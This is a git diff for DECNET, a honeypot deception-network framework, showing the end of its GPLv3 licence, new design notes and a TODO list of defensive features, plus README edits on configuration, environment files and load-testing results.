|
||||
specifically for use in, a User Product, and the conveying occurs as
|
||||
part of a transaction in which the right of possession and use of the
|
||||
User Product is transferred to the recipient in perpetuity or for a
|
||||
fixed term (regardless of how the transaction is characterized), the
|
||||
Corresponding Source conveyed under this section must be accompanied
|
||||
by the Installation Information. But this requirement does not apply
|
||||
if neither you nor any third party retains the ability to install
|
||||
modified object code on the User Product (for example, the work has
|
||||
been installed in ROM).
|
||||
|
||||
The requirement to provide Installation Information does not include a
|
||||
requirement to continue to provide support service, warranty, or updates
|
||||
for a work that has been modified or installed by the recipient, or for
|
||||
the User Product in which it has been modified or installed. Access to a
|
||||
network may be denied when the modification itself materially and
|
||||
adversely affects the operation of the network or violates the rules and
|
||||
protocols for communication across the network.
|
||||
|
||||
Corresponding Source conveyed, and Installation Information provided,
|
||||
in accord with this section must be in a format that is publicly
|
||||
documented (and with an implementation available to the public in
|
||||
source code form), and must require no special password or key for
|
||||
unpacking, reading or copying.
|
||||
|
||||
7. Additional Terms.
|
||||
|
||||
"Additional permissions" are terms that supplement the terms of this
|
||||
License by making exceptions from one or more of its conditions.
|
||||
Additional permissions that are applicable to the entire Program shall
|
||||
be treated as though they were included in this License, to the extent
|
||||
that they are valid under applicable law. If additional permissions
|
||||
apply only to part of the Program, that part may be used separately
|
||||
under those permissions, but the entire Program remains governed by
|
||||
this License without regard to the additional permissions.
|
||||
|
||||
When you convey a copy of a covered work, you may at your option
|
||||
remove any additional permissions from that copy, or from any part of
|
||||
it. (Additional permissions may be written to require their own
|
||||
removal in certain cases when you modify the work.) You may place
|
||||
additional permissions on material, added by you to a covered work,
|
||||
for which you have or can give appropriate copyright permission.
|
||||
|
||||
Notwithstanding any other provision of this License, for material you
|
||||
add to a covered work, you may (if authorized by the copyright holders of
|
||||
that material) supplement the terms of this License with terms:
|
||||
|
||||
a) Disclaiming warranty or limiting liability differently from the
|
||||
terms of sections 15 and 16 of this License; or
|
||||
|
||||
b) Requiring preservation of specified reasonable legal notices or
|
||||
author attributions in that material or in the Appropriate Legal
|
||||
Notices displayed by works containing it; or
|
||||
|
||||
c) Prohibiting misrepresentation of the origin of that material, or
|
||||
requiring that modified versions of such material be marked in
|
||||
reasonable ways as different from the original version; or
|
||||
|
||||
d) Limiting the use for publicity purposes of names of licensors or
|
||||
authors of the material; or
|
||||
|
||||
e) Declining to grant rights under trademark law for use of some
|
||||
trade names, trademarks, or service marks; or
|
||||
|
||||
f) Requiring indemnification of licensors and authors of that
|
||||
material by anyone who conveys the material (or modified versions of
|
||||
it) with contractual assumptions of liability to the recipient, for
|
||||
any liability that these contractual assumptions directly impose on
|
||||
those licensors and authors.
|
||||
|
||||
All other non-permissive additional terms are considered "further
|
||||
restrictions" within the meaning of section 10. If the Program as you
|
||||
received it, or any part of it, contains a notice stating that it is
|
||||
governed by this License along with a term that is a further
|
||||
restriction, you may remove that term. If a license document contains
|
||||
a further restriction but permits relicensing or conveying under this
|
||||
License, you may add to a covered work material governed by the terms
|
||||
of that license document, provided that the further restriction does
|
||||
not survive such relicensing or conveying.
|
||||
|
||||
If you add terms to a covered work in accord with this section, you
|
||||
must place, in the relevant source files, a statement of the
|
||||
additional terms that apply to those files, or a notice indicating
|
||||
where to find the applicable terms.
|
||||
|
||||
Additional terms, permissive or non-permissive, may be stated in the
|
||||
form of a separately written license, or stated as exceptions;
|
||||
the above requirements apply either way.
|
||||
|
||||
8. Termination.
|
||||
|
||||
You may not propagate or modify a covered work except as expressly
|
||||
provided under this License. Any attempt otherwise to propagate or
|
||||
modify it is void, and will automatically terminate your rights under
|
||||
this License (including any patent licenses granted under the third
|
||||
paragraph of section 11).
|
||||
|
||||
However, if you cease all violation of this License, then your
|
||||
license from a particular copyright holder is reinstated (a)
|
||||
provisionally, unless and until the copyright holder explicitly and
|
||||
finally terminates your license, and (b) permanently, if the copyright
|
||||
holder fails to notify you of the violation by some reasonable means
|
||||
prior to 60 days after the cessation.
|
||||
|
||||
Moreover, your license from a particular copyright holder is
|
||||
reinstated permanently if the copyright holder notifies you of the
|
||||
violation by some reasonable means, this is the first time you have
|
||||
received notice of violation of this License (for any work) from that
|
||||
copyright holder, and you cure the violation prior to 30 days after
|
||||
your receipt of the notice.
|
||||
|
||||
Termination of your rights under this section does not terminate the
|
||||
licenses of parties who have received copies or rights from you under
|
||||
this License. If your rights have been terminated and not permanently
|
||||
reinstated, you do not qualify to receive new licenses for the same
|
||||
material under section 10.
|
||||
|
||||
9. Acceptance Not Required for Having Copies.
|
||||
|
||||
You are not required to accept this License in order to receive or
|
||||
run a copy of the Program. Ancillary propagation of a covered work
|
||||
occurring solely as a consequence of using peer-to-peer transmission
|
||||
to receive a copy likewise does not require acceptance. However,
|
||||
nothing other than this License grants you permission to propagate or
|
||||
modify any covered work. These actions infringe copyright if you do
|
||||
not accept this License. Therefore, by modifying or propagating a
|
||||
covered work, you indicate your acceptance of this License to do so.
|
||||
|
||||
10. Automatic Licensing of Downstream Recipients.
|
||||
|
||||
Each time you convey a covered work, the recipient automatically
|
||||
receives a license from the original licensors, to run, modify and
|
||||
propagate that work, subject to this License. You are not responsible
|
||||
for enforcing compliance by third parties with this License.
|
||||
|
||||
An "entity transaction" is a transaction transferring control of an
|
||||
organization, or substantially all assets of one, or subdividing an
|
||||
organization, or merging organizations. If propagation of a covered
|
||||
work results from an entity transaction, each party to that
|
||||
transaction who receives a copy of the work also receives whatever
|
||||
licenses to the work the party's predecessor in interest had or could
|
||||
give under the previous paragraph, plus a right to possession of the
|
||||
Corresponding Source of the work from the predecessor in interest, if
|
||||
the predecessor has it or can get it with reasonable efforts.
|
||||
|
||||
You may not impose any further restrictions on the exercise of the
|
||||
rights granted or affirmed under this License. For example, you may
|
||||
not impose a license fee, royalty, or other charge for exercise of
|
||||
rights granted under this License, and you may not initiate litigation
|
||||
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
||||
any patent claim is infringed by making, using, selling, offering for
|
||||
sale, or importing the Program or any portion of it.
|
||||
|
||||
11. Patents.
|
||||
|
||||
A "contributor" is a copyright holder who authorizes use under this
|
||||
License of the Program or a work on which the Program is based. The
|
||||
work thus licensed is called the contributor's "contributor version".
|
||||
|
||||
A contributor's "essential patent claims" are all patent claims
|
||||
owned or controlled by the contributor, whether already acquired or
|
||||
hereafter acquired, that would be infringed by some manner, permitted
|
||||
by this License, of making, using, or selling its contributor version,
|
||||
but do not include claims that would be infringed only as a
|
||||
consequence of further modification of the contributor version. For
|
||||
purposes of this definition, "control" includes the right to grant
|
||||
patent sublicenses in a manner consistent with the requirements of
|
||||
this License.
|
||||
|
||||
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||
patent license under the contributor's essential patent claims, to
|
||||
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||
propagate the contents of its contributor version.
|
||||
|
||||
In the following three paragraphs, a "patent license" is any express
|
||||
agreement or commitment, however denominated, not to enforce a patent
|
||||
(such as an express permission to practice a patent or covenant not to
|
||||
sue for patent infringement). To "grant" such a patent license to a
|
||||
party means to make such an agreement or commitment not to enforce a
|
||||
patent against the party.
|
||||
|
||||
If you convey a covered work, knowingly relying on a patent license,
|
||||
and the Corresponding Source of the work is not available for anyone
|
||||
to copy, free of charge and under the terms of this License, through a
|
||||
publicly available network server or other readily accessible means,
|
||||
then you must either (1) cause the Corresponding Source to be so
|
||||
available, or (2) arrange to deprive yourself of the benefit of the
|
||||
patent license for this particular work, or (3) arrange, in a manner
|
||||
consistent with the requirements of this License, to extend the patent
|
||||
license to downstream recipients. "Knowingly relying" means you have
|
||||
actual knowledge that, but for the patent license, your conveying the
|
||||
covered work in a country, or your recipient's use of the covered work
|
||||
in a country, would infringe one or more identifiable patents in that
|
||||
country that you have reason to believe are valid.
|
||||
|
||||
If, pursuant to or in connection with a single transaction or
|
||||
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||
covered work, and grant a patent license to some of the parties
|
||||
receiving the covered work authorizing them to use, propagate, modify
|
||||
or convey a specific copy of the covered work, then the patent license
|
||||
you grant is automatically extended to all recipients of the covered
|
||||
work and works based on it.
|
||||
|
||||
A patent license is "discriminatory" if it does not include within
|
||||
the scope of its coverage, prohibits the exercise of, or is
|
||||
conditioned on the non-exercise of one or more of the rights that are
|
||||
specifically granted under this License. You may not convey a covered
|
||||
work if you are a party to an arrangement with a third party that is
|
||||
in the business of distributing software, under which you make payment
|
||||
to the third party based on the extent of your activity of conveying
|
||||
the work, and under which the third party grants, to any of the
|
||||
parties who would receive the covered work from you, a discriminatory
|
||||
patent license (a) in connection with copies of the covered work
|
||||
conveyed by you (or copies made from those copies), or (b) primarily
|
||||
for and in connection with specific products or compilations that
|
||||
contain the covered work, unless you entered into that arrangement,
|
||||
or that patent license was granted, prior to 28 March 2007.
|
||||
|
||||
Nothing in this License shall be construed as excluding or limiting
|
||||
any implied license or other defenses to infringement that may
|
||||
otherwise be available to you under applicable patent law.
|
||||
|
||||
12. No Surrender of Others' Freedom.
|
||||
|
||||
If conditions are imposed on you (whether by court order, agreement or
|
||||
otherwise) that contradict the conditions of this License, they do not
|
||||
excuse you from the conditions of this License. If you cannot convey a
|
||||
covered work so as to satisfy simultaneously your obligations under this
|
||||
License and any other pertinent obligations, then as a consequence you may
|
||||
not convey it at all. For example, if you agree to terms that obligate you
|
||||
to collect a royalty for further conveying from those to whom you convey
|
||||
the Program, the only way you could satisfy both those terms and this
|
||||
License would be to refrain entirely from conveying the Program.
|
||||
|
||||
13. Use with the GNU Affero General Public License.
|
||||
|
||||
Notwithstanding any other provision of this License, you have
|
||||
permission to link or combine any covered work with a work licensed
|
||||
under version 3 of the GNU Affero General Public License into a single
|
||||
combined work, and to convey the resulting work. The terms of this
|
||||
License will continue to apply to the part which is the covered work,
|
||||
but the special requirements of the GNU Affero General Public License,
|
||||
section 13, concerning interaction through a network will apply to the
|
||||
combination as such.
|
||||
|
||||
14. Revised Versions of this License.
|
||||
|
||||
The Free Software Foundation may publish revised and/or new versions of
|
||||
the GNU General Public License from time to time. Such new versions will
|
||||
be similar in spirit to the present version, but may differ in detail to
|
||||
address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the
|
||||
Program specifies that a certain numbered version of the GNU General
|
||||
Public License "or any later version" applies to it, you have the
|
||||
option of following the terms and conditions either of that numbered
|
||||
version or of any later version published by the Free Software
|
||||
Foundation. If the Program does not specify a version number of the
|
||||
GNU General Public License, you may choose any version ever published
|
||||
by the Free Software Foundation.
|
||||
|
||||
If the Program specifies that a proxy can decide which future
|
||||
versions of the GNU General Public License can be used, that proxy's
|
||||
public statement of acceptance of a version permanently authorizes you
|
||||
to choose that version for the Program.
|
||||
|
||||
Later license versions may give you additional or different
|
||||
permissions. However, no additional obligations are imposed on any
|
||||
author or copyright holder as a result of your choosing to follow a
|
||||
later version.
|
||||
|
||||
15. Disclaimer of Warranty.
|
||||
|
||||
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||
|
||||
16. Limitation of Liability.
|
||||
|
||||
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||
SUCH DAMAGES.
|
||||
|
||||
17. Interpretation of Sections 15 and 16.
|
||||
|
||||
If the disclaimer of warranty and limitation of liability provided
|
||||
above cannot be given local legal effect according to their terms,
|
||||
reviewing courts shall apply local law that most closely approximates
|
||||
an absolute waiver of all civil liability in connection with the
|
||||
Program, unless a warranty or assumption of liability accompanies a
|
||||
copy of the Program in return for a fee.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
How to Apply These Terms to Your New Programs
|
||||
|
||||
If you develop a new program, and you want it to be of the greatest
|
||||
possible use to the public, the best way to achieve this is to make it
|
||||
free software which everyone can redistribute and change under these terms.
|
||||
|
||||
To do so, attach the following notices to the program. It is safest
|
||||
to attach them to the start of each source file to most effectively
|
||||
state the exclusion of warranty; and each file should have at least
|
||||
the "copyright" line and a pointer to where the full notice is found.
|
||||
|
||||
<one line to give the program's name and a brief idea of what it does.>
|
||||
Copyright (C) <year> <name of author>
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <https://www.gnu.org/licenses/>.
|
||||
|
||||
Also add information on how to contact you by electronic and paper mail.
|
||||
|
||||
If the program does terminal interaction, make it output a short
|
||||
notice like this when it starts in an interactive mode:
|
||||
|
||||
<program> Copyright (C) <year> <name of author>
|
||||
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions; type `show c' for details.
|
||||
|
||||
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||
parts of the General Public License. Of course, your program's commands
|
||||
might be different; for a GUI interface, you would use an "about box".
|
||||
|
||||
You should also get your employer (if you work as a programmer) or school,
|
||||
if any, to sign a "copyright disclaimer" for the program, if necessary.
|
||||
For more information on this, and how to apply and follow the GNU GPL, see
|
||||
<https://www.gnu.org/licenses/>.
|
||||
|
||||
The GNU General Public License does not permit incorporating your program
|
||||
into proprietary programs. If your program is a subroutine library, you
|
||||
may consider it more useful to permit linking proprietary applications with
|
||||
the library. If this is what you want to do, use the GNU Lesser General
|
||||
Public License instead of this License. But first, please read
|
||||
<https://www.gnu.org/licenses/why-not-lgpl.html>.
|
||||
113
NOTES.md
Normal file
113
NOTES.md
Normal file
@@ -0,0 +1,113 @@
|
||||
# Initial steps
|
||||
|
||||
# Architecture
|
||||
|
||||
## DECNET-UNIHOST model
|
||||
|
||||
The unihost model is a mode in which DECNET deploys an _n_ amount of machines from a single one. This execution model lives in a decoy network which is accessible to an attacker from the outside.
|
||||
|
||||
Each decky (the son of the DECNET unihost) should have different services (RDP, SMB, SSH, FTP, etc) and all of them should communicate with an external, isolated network, which aggregates data and allows
|
||||
visualizations to be made. Think of the ELK stack. That data is then passed back via Logstash or other methods to a SIEM device or something else that may be beneficiated by this collected data.
|
||||
|
||||
## DECNET-MULTIHOST (SWARM) model
|
||||
|
||||
The SWARM model is similar to the UNIHOST model, but the difference is that instead of one real machine, we have n>1 machines. Same thought process really, but deployment may be different.
|
||||
A low cost option and fairly automatable one is the usage of Ansible, sshpass, or other tools.
|
||||
|
||||
# Modus operandi
|
||||
|
||||
## Docker-Compose
|
||||
|
||||
I will use Docker Compose extensively for this project. The reasons are:
|
||||
- Easily managed.
|
||||
- Easily extensible.
|
||||
- Less overhead.
|
||||
|
||||
To be completely transparent: I asked Deepseek to write the initial `docker-compose.yml` file. It was mostly boilerplate, and most of it mainly modified or deleted. It doesn't exist anymore.
|
||||
|
||||
## Distro to use.
|
||||
|
||||
I will be using the `debian:bookworm-slim` image for all the containers. I might think about mixing in there some Ubuntu or a Centos, but for now, Debian will do just fine.
|
||||
|
||||
The distro I'm running is WSL Kali Linux. Let's hope this doesn't cause any problems down the road.
|
||||
|
||||
## Networking
|
||||
|
||||
It was a hussle, but I think MACVLAN or IPVLAN (thanks @Deepseek!) might work. The reasoning behind picking this networking driver is that for the project to work, it requires having containers the entire container accessible from the network. This is to attempt to masquarede them as real, live machines.
|
||||
|
||||
Now, we will need a publicly accesible, real server that has access to this "internal" network. I'll try MACVLAN first.
|
||||
|
||||
### MACVLAN Tests
|
||||
|
||||
I will first use the default network to see what happens.
|
||||
|
||||
```
|
||||
docker network create -d macvlan \
|
||||
--subnet=192.168.1.0/24 \
|
||||
--gateway=192.168.1.1 \
|
||||
-o parent=eth0 localnet
|
||||
```
|
||||
|
||||
#### Issues
|
||||
|
||||
This initial test doesn't seem to be working. Might be that I'm using WSL, so I downloaded a Ubuntu 22.04 Server ISO. I'll try the MACVLAN network on it. Now, if that doesn't work, I don't see how the 802.1q would work, at least on _my network_. Perhaps if I had a switch I could make it work, but currently I don't have one :c
|
||||
|
||||
---
|
||||
|
||||
# TODO
|
||||
|
||||
## Core / Hardening
|
||||
|
||||
- [ ] **Attacker fingerprinting** — Beyond IP logging: capture TLS JA3/JA4 hashes, TCP window sizes, User-Agent strings, SSH client banners, and tool signatures (nmap, masscan, Metasploit, Cobalt Strike). Build attacker profiles across sessions.
|
||||
- [ ] **Canary tokens** — Embed canary URLs, fake AWS keys, fake API tokens, and honeydocs (PDF/DOCX with phone-home URLs) into decky filesystems. Fire an alert the moment one is used.
|
||||
- [ ] **Tarpit mode** — Slow down attackers by making services respond extremely slowly (e.g., SSH that takes 60s to reject, HTTP that drip-feeds bytes). Wastes attacker time and resources.
|
||||
- [ ] **Dynamic decky mutation** — Deckies that change their exposed services or OS fingerprint over time to confuse port-scan caching and appear more "alive."
|
||||
- [ ] **Credential harvesting DB** — Every username/password attempt across all services lands in a queryable database. Expose via CLI (`decnet creds`) and flag reuse across deckies.
|
||||
- [ ] **Session recording** — Full session capture for SSH/Telnet (keystroke logs, commands run, files downloaded). Cowrie already does this — surface it better in the CLI and correlation engine.
|
||||
- [ ] **Payload capture** — Store every file uploaded or command executed by an attacker. Hash and auto-submit to VirusTotal or a local sandbox.
|
||||
|
||||
## Detection & Intelligence
|
||||
|
||||
- [ ] **Real-time alerting** — Webhook/Slack/Telegram notifications when an attacker hits a decky for the first time, crosses N deckies (lateral movement), or uses a known bad IP.
|
||||
- [ ] **Threat intel enrichment** — Auto-lookup attacker IPs against AbuseIPDB, Shodan, GreyNoise, and AlienVault OTX. Tag known scanners vs. targeted attackers.
|
||||
- [ ] **Attack campaign clustering** — Group attacker sessions by tooling signatures, timing patterns, and credential sets. Identify coordinated campaigns hitting multiple deckies.
|
||||
- [ ] **GeoIP mapping** — Attacker origin on a world map. Correlate with ASN data to identify cloud exit nodes, VPNs, and Tor exits.
|
||||
- [ ] **TTPs tagging** — Map observed attacker behaviors to MITRE ATT&CK techniques automatically. Tag events in the correlation engine.
|
||||
- [ ] **Honeypot interaction scoring** — Score attackers on a scale: casual scanner vs. persistent targeted attacker, based on depth of interaction and commands run.
|
||||
|
||||
## Dashboard & Visibility
|
||||
|
||||
- [ ] **Web dashboard** — Real-time web UI showing live decky status, attacker activity, traversal graphs, and credential stats. Could be a simple FastAPI + HTMX or a full React app.
|
||||
- [ ] **Pre-built Kibana/Grafana dashboards** — Ship dashboard JSON exports out of the box so ELK/Grafana deployments are plug-and-play.
|
||||
- [ ] **CLI live feed** — `decnet watch` command: tail all decky logs in a unified, colored terminal stream (like `docker-compose logs -f` but prettier).
|
||||
- [ ] **Traversal graph export** — Export attacker traversal graphs as DOT/Graphviz or JSON for visualization in external tools.
|
||||
- [ ] **Daily digest** — Automated daily summary email/report: new attackers, top credentials tried, most-hit services.
|
||||
|
||||
## Deployment & Infrastructure
|
||||
|
||||
- [ ] **SWARM / multihost mode** — Full Ansible-based orchestration for deploying deckies across N real hosts.
|
||||
- [ ] **Terraform/Pulumi provider** — Spin up cloud-hosted deckies on AWS/GCP/Azure with one command. Useful for internet-facing honeynets.
|
||||
- [ ] **Auto-scaling** — When attack traffic increases, automatically spawn more deckies to absorb and log more activity.
|
||||
- [ ] **Kubernetes deployment mode** — Run deckies as Kubernetes pods for environments already running k8s.
|
||||
- [ ] **Proxmox/libvirt backend** — Full VM-based deckies instead of containers, for even more realistic OS fingerprints and behavior. Docker for speed; VMs for realism.
|
||||
- [ ] **Raspberry Pi / ARM support** — Low-cost physical honeynets using RPis. Validate ARM image builds.
|
||||
- [ ] **Decky health monitoring** — Watchdog that auto-restarts crashed deckies and alerts if a service goes dark.
|
||||
|
||||
## Services & Realism
|
||||
|
||||
- [ ] **HTTPS/TLS support** — HTTP honeypot with a self-signed or Let's Encrypt cert. Many real-world services use HTTPS; plain HTTP stands out.
|
||||
- [ ] **Fake Active Directory** — A convincing fake AD/LDAP with fake users, groups, and GPOs. Attacker tools like BloodHound should get juicy (fake) data.
|
||||
- [ ] **Fake file shares** — SMB/NFS shares pre-populated with enticing but fake files: "passwords.xlsx", "vpn_config.ovpn", "backup_keys.tar.gz". All instrumented to detect access.
|
||||
- [ ] **Realistic web apps** — HTTP honeypot serving convincing fake apps: a fake WordPress, a fake phpMyAdmin, a fake Grafana login — all logging every interaction.
|
||||
- [ ] **OT/ICS profiles** — Expand Conpot support: Modbus, DNP3, BACnet, EtherNet/IP. Convincing industrial control system decoys.
|
||||
- [ ] **Printer/IoT archetypes** — Expand existing printer/camera archetypes with actual service emulation (IPP, ONVIF, WS-Discovery).
|
||||
- [ ] **Service interaction depth** — Some services currently just log the connection. Deepen interaction: fake MySQL that accepts queries and returns realistic fake data, fake Redis that stores and retrieves dummy keys.
|
||||
|
||||
## Developer Experience
|
||||
|
||||
- [ ] **Plugin SDK docs** — Full documentation and an example plugin for adding custom services. Lower the barrier for community contributions.
|
||||
- [ ] **Integration tests** — Full deploy/teardown cycle tests against a real Docker daemon (not just unit tests).
|
||||
- [ ] **Per-service tests** — Each of the 29 service implementations deserves its own test coverage.
|
||||
- [ ] **CI/CD pipeline** — GitHub/Gitea Actions: run tests on push, lint, build Docker images, publish releases.
|
||||
- [ ] **Config validation CLI** — `decnet validate my.ini` to dry-check an INI config before deploying.
|
||||
- [ ] **Config generator wizard** — `decnet wizard` interactive prompt to generate an INI config without writing one by hand.
|
||||
166
README.md
166
README.md
@@ -4,8 +4,6 @@ A honeypot deception network framework. Spin up a fleet of fake machines — cal
|
||||
|
||||
Attackers probe the network, DECNET traps every interaction, and you watch from a safe, isolated logging stack.
|
||||
|
||||
[](https://ko-fi.com/C0C31YDLB5)
|
||||
|
||||
---
|
||||
|
||||
## Table of Contents
|
||||
@@ -71,7 +69,7 @@ From the outside a decky looks identical to a real machine: it has its own MAC a
|
||||
## Installation
|
||||
|
||||
```bash
|
||||
git clone https://git.resacachile.cl/anti/DECNET
|
||||
git clone <repo-url> DECNET
|
||||
cd DECNET
|
||||
pip install -e .
|
||||
```
|
||||
@@ -209,26 +207,6 @@ sudo decnet deploy --deckies 4 --archetype windows-workstation
|
||||
[corp-workstations]
|
||||
archetype = windows-workstation
|
||||
amount = 4
|
||||
|
||||
[win-fileserver]
|
||||
services = ftp
|
||||
nmap_os = windows
|
||||
os_version = Windows Server 2019
|
||||
|
||||
[dbsrv01]
|
||||
ip = 192.168.1.112
|
||||
services = mysql, http
|
||||
nmap_os = linux
|
||||
|
||||
[dbsrv01.http]
|
||||
server_header = Apache/2.4.54 (Debian)
|
||||
response_code = 200
|
||||
fake_app = wordpress
|
||||
|
||||
[dbsrv01.mysql]
|
||||
mysql_version = 5.7.38-log
|
||||
mysql_banner = MySQL Community Server
|
||||
|
||||
```
|
||||
|
||||
---
|
||||
@@ -476,7 +454,7 @@ Key/value pairs are passed directly to the service plugin as persona config. Com
|
||||
| `mongodb` | `mongo_version` |
|
||||
| `elasticsearch` | `es_version`, `cluster_name` |
|
||||
| `ldap` | `base_dn`, `domain` |
|
||||
| `snmp` | `snmp_community`, `sys_descr`, `snmp_archetype` (picks predefined sysDescr for `water_plant`, `hospital`, etc.) |
|
||||
| `snmp` | `snmp_community`, `sys_descr` |
|
||||
| `mqtt` | `mqtt_version` |
|
||||
| `sip` | `sip_server`, `sip_domain` |
|
||||
| `k8s` | `k8s_version` |
|
||||
@@ -492,34 +470,6 @@ See [`test-full.ini`](test-full.ini) — covers all 25 services across 10 role-t
|
||||
|
||||
---
|
||||
|
||||
## Environment Configuration (.env)
|
||||
|
||||
DECNET supports loading configuration from `.env.local` and `.env` files located in the project root. This is useful for securing secrets like the JWT key and configuring default ports without passing flags every time.
|
||||
|
||||
An example `.env.example` is provided:
|
||||
|
||||
```ini
|
||||
# API Options
|
||||
DECNET_API_HOST=0.0.0.0
|
||||
DECNET_API_PORT=8000
|
||||
DECNET_JWT_SECRET=supersecretkey12345
|
||||
DECNET_INGEST_LOG_FILE=/var/log/decnet/decnet.log
|
||||
|
||||
# Web Dashboard Options
|
||||
DECNET_WEB_HOST=0.0.0.0
|
||||
DECNET_WEB_PORT=8080
|
||||
DECNET_ADMIN_USER=admin
|
||||
DECNET_ADMIN_PASSWORD=admin
|
||||
|
||||
# Database pool tuning (applies to both SQLite and MySQL)
|
||||
DECNET_DB_POOL_SIZE=20 # base pool connections (default: 20)
|
||||
DECNET_DB_MAX_OVERFLOW=40 # extra connections under burst (default: 40)
|
||||
```
|
||||
|
||||
Copy `.env.example` to `.env.local` and modify it to suit your environment.
|
||||
|
||||
---
|
||||
|
||||
## Logging
|
||||
|
||||
All attacker interactions are forwarded off the decoy network to an isolated logging sink. The log pipeline lives on a separate internal Docker bridge (`decnet_logs`) that is not reachable from the fake LAN.
|
||||
@@ -681,115 +631,3 @@ The test suite covers:
|
||||
| `test_cli_service_pool.py` | CLI service resolution |
|
||||
|
||||
Every new feature requires passing tests before merging.
|
||||
|
||||
### Stress Testing
|
||||
|
||||
A [Locust](https://locust.io)-based stress test suite lives in `tests/stress/`. It hammers every API endpoint with realistic traffic patterns to find throughput ceilings and latency degradation.
|
||||
|
||||
```bash
|
||||
# Run via pytest (starts its own server)
|
||||
pytest -m stress tests/stress/ -v -x -n0 -s
|
||||
|
||||
# Crank it up
|
||||
STRESS_USERS=2000 STRESS_SPAWN_RATE=200 STRESS_DURATION=120 pytest -m stress tests/stress/ -v -x -n0 -s
|
||||
|
||||
# Standalone Locust web UI against a running server
|
||||
locust -f tests/stress/locustfile.py --host http://localhost:8000
|
||||
```
|
||||
|
||||
| Env var | Default | Description |
|
||||
|---|---|---|
|
||||
| `STRESS_USERS` | `500` | Total simulated users |
|
||||
| `STRESS_SPAWN_RATE` | `50` | Users spawned per second |
|
||||
| `STRESS_DURATION` | `60` | Test duration in seconds |
|
||||
| `STRESS_WORKERS` | CPU count (max 4) | Uvicorn workers for the test server |
|
||||
| `STRESS_MIN_RPS` | `500` | Minimum RPS to pass baseline test |
|
||||
| `STRESS_MAX_P99_MS` | `200` | Maximum p99 latency (ms) to pass |
|
||||
| `STRESS_SPIKE_USERS` | `1000` | Users for thundering herd test |
|
||||
| `STRESS_SUSTAINED_USERS` | `200` | Users for sustained load test |
|
||||
|
||||
#### Measured baseline
|
||||
|
||||
Reference numbers from recent Locust runs against a MySQL backend
|
||||
(asyncmy driver). All runs hold zero failures throughout.
|
||||
|
||||
**Single worker** (unless noted):
|
||||
|
||||
| Metric | 500u, tracing on | 1500u, tracing on | 1500u, tracing **off** | 1500u, tracing off, **pinned to 1 core** | 1500u, tracing off, **12 workers** |
|
||||
|---|---|---|---|---|---|
|
||||
| Requests served | 396,672 | 232,648 | 277,214 | 3,532 | 308,024 |
|
||||
| Failures | 0 | 0 | 0 | 0 | 0 |
|
||||
| Throughput (current RPS) | ~960 | ~880 | ~990 | ~46 | ~1,585 |
|
||||
| Average latency | 465 ms | 1,774 ms | 1,489 ms | 21.7 s | 930 ms |
|
||||
| Median (p50) | 100 ms | 690 ms | 340 ms | 270 ms | 700 ms |
|
||||
| p95 | 1.9 s | 6.5 s | 5.7 s | 115 s | 2.7 s |
|
||||
| p99 | 2.9 s | 9.5 s | 8.4 s | 122 s | 4.2 s |
|
||||
| Max observed | 8.3 s | 24.4 s | 20.9 s | 124.5 s | 16.5 s |
|
||||
|
||||
Ramp is 15 users/s for the 500u column, 40 users/s otherwise.
|
||||
|
||||
Takeaways:
|
||||
|
||||
- **Tracing off**: at 1500 users, flipping `DECNET_TRACING=false`
|
||||
halves p50 (690 → 340 ms) and pushes RPS from ~880 past the
|
||||
500-user figure on a single worker.
|
||||
- **12 workers**: RPS scales ~1.6× over a single worker (~990 →
|
||||
~1585). Sublinear because the workload is DB-bound — MySQL and the
|
||||
connection pool become the new ceiling, not Python. p99 drops from
|
||||
8.4 s to 4.2 s.
|
||||
- **Connection math**: `DECNET_DB_POOL_SIZE=20` × `DECNET_DB_MAX_OVERFLOW=40`
|
||||
× 12 workers = 720 connections at peak. MySQL's default
|
||||
`max_connections=151` needs bumping (we used 2000) before running
|
||||
multi-worker load.
|
||||
